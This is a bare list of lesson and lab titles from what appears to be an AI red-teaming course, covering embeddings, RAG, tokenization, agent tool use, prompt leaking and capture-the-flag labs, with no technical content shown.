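Embeddings and Vector Spaces for Red Teamers

Hands-On: Exploring Embedding Space

RAG Architecture: How Retrieval Systems Work

Semantic Similarity and Vector Search Attacks

Inference: Sampling, Temperature, and Generation

Tokenization and Its Security Implications

The Pretraining → Fine-Tuning → RLHF Pipeline

Transformer Architecture for Attackers

Agent Architectures and Tool-Use Patterns

Common AI Deployment Patterns and Attack Surfaces

Hands-On: Mapping the Attack Surface of an AI System

CTF: Code Generation Attacks

CTF: The RAG Heist

Intermediate AI Red Team Labs

Advanced Encoding Chain Attacks

Lab: Advanced Function Calling Exploitation

Lab: Automated Adversarial Prompt Generation

Agent Memory Manipulation

Lab: Agent Prompt Leaking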